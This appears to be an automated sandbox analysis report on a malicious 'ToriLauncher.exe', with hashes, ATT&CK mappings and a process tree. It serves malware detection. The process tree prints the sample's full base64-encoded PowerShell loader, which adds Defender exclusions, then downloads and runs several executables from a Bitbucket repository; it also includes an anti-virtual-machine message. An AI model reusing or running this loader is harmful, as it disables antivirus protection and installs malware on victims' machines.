127aa2f0bbd871bc946d3b9cdc909702b0884bedcf77fd893d3de56e9e980d1d

General

Target

ToriLauncher.exe
Size

15KB
MD5

8a25dfc69da1d9d86fd6b6aa54ce7fb9
SHA1

e1448945d8218944eee8828a387faeeafcddcdd3
SHA256

8a47dfd07adaaefcdb36c9ca7453c240dfe10c3dd4fa0e87f5c9769b7c48a5f1
SHA512

63dbe47828d49f88a15c39499b73a699622a8a8ceeebe71c81aad95628d09c53353c6c4ff7431b688e569facd0582c40a6609b15aee150ff1e7b4082c97fae8a
SSDEEP

384:n8rbishHxlUvJCB2NdCBhNokwVcqDkiCBYkMNt//ZNt/+4Nt/UVRD59KUC9u:nib5hxlUvJCB2NdCBhNokwVcqDkiCBYh

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exe

flow	pid	process
4	1164	powershell.exe
5	1164	powershell.exe
6	1164	powershell.exe
7	1164	powershell.exe
8	1164	powershell.exe
9	1164	powershell.exe
10	1164	powershell.exe
11	1164	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1164 powershell.exe
1164 powershell.exe
1164 powershell.exe
1716 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

ToriLauncher.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2028 ToriLauncher.exe
Token: SeDebugPrivilege 1164 powershell.exe
Token: SeDebugPrivilege 1716 powershell.exe

pid	process
1164	powershell.exe
1164	powershell.exe
1164	powershell.exe
1716	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2028	ToriLauncher.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

ToriLauncher.exepowershell.exe

description	pid	process	target process
PID 2028 wrote to memory of 1164	2028	ToriLauncher.exe	powershell.exe
PID 2028 wrote to memory of 1164	2028	ToriLauncher.exe	powershell.exe
PID 2028 wrote to memory of 1164	2028	ToriLauncher.exe	powershell.exe
PID 1164 wrote to memory of 1716	1164	powershell.exe	powershell.exe
PID 1164 wrote to memory of 1716	1164	powershell.exe	powershell.exe
PID 1164 wrote to memory of 1716	1164	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\ToriLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\ToriLauncher.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZQBjACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHcAZQBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAbwBuACAAYQBuAG8AdABoAGUAcgAgAFAAQwAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBwAGUAbAAjAD4AOwAiADsAPAAjAHMAdwBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABhAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB4AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBhAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAEMATABFAFAALgBlAHgAZQAnACwAIAA8ACMAaABnAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBoAG8AcwB0AC4AZQB4AGUAJwApACkAPAAjAHkAYwB5ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAEQARQBWAE0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAHMAZwBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABhAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBmAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAcABhAGoAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxADEANQA2AC8AdABoAGkAcwBpAHMAZgBvAHIAZQBkAHUAYwBhAHQAaQBvAG4AYQBsAHAAdQByAHAAbwBzAGUAcwBvAG4AbAB5AC8AcgBhAHcALwBiAGMAMQA4ADUANQAzAGEAZgAyADgANgAxADUANAAzAGIANAAwADYAYgAwAGMAYQA5ADYANwBkADEAZgBmADQAOAA1ADAAMQBmADgANgBhAC8ARABlAHYAUwB0AC4AZQB4AGUAJwAsACAAPAAjAHIAegB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAGsAeABtACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAxADUANgAvAHQAaABpAHMAaQBzAGYAbwByAGUAZAB1AGMAYQB0AGkAbwBuAGEAbABwAHUAcgBwAG8AcwBlAHMAbwBuAGwAeQAvAHIAYQB3AC8AYgBjADEAOAA1ADUAMwBhAGYAMgA4ADYAMQA1ADQAMwBiADQAMAA2AGIAMABjAGEAOQA2ADcAZAAxAGYAZgA0ADgANQAwADEAZgA4ADYAYQAvAGQAZQB2AGEAbAB0AC4AZQB4AGUAJwAsACAAPAAjAHEAagBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgB4AHoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgByAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAKQA8ACMAdAB1AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgB0AGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBHAGUAdAAuAGUAeABlACcAKQA8ACMAegB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBxAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAdgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAYwBwAHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBiAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAZABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAE8AdQB0AHAAdQB0AC4AZQB4AGUAJwApADwAIwBoAGEAYQAjAD4A"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#wed#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try on another PC!','','OK','Error')<#pel#>;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
2a40c5ea921746b7985b5c498dcdd0cf

SHA1
8d7035a32a50a64e661d1528cd74f4e5fec77a44

SHA256
df1826382e09b84b344662e29b7713055af3e46852e234a262161ceb475a8f80

SHA512
4616073b1c88440d96f7d215862ce969377b0ae88aa18fd01661a41f1b7fa1a6b096e305a8158f8c3e332fbb95c26c49cef7c5abb7770be0d7f6d2f81f1ffa1c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A946IJ7B677TLGTSLB9F.temp
Filesize
7KB

MD5
2a40c5ea921746b7985b5c498dcdd0cf

SHA1
8d7035a32a50a64e661d1528cd74f4e5fec77a44

SHA256
df1826382e09b84b344662e29b7713055af3e46852e234a262161ceb475a8f80

SHA512
4616073b1c88440d96f7d215862ce969377b0ae88aa18fd01661a41f1b7fa1a6b096e305a8158f8c3e332fbb95c26c49cef7c5abb7770be0d7f6d2f81f1ffa1c

Download Submit
memory/1164-59-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1164-60-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/1164-61-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1164-62-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1164-68-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1164-69-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1164-72-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1716-70-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/1716-71-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2028-54-0x00000000011E0000-0x00000000011EA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing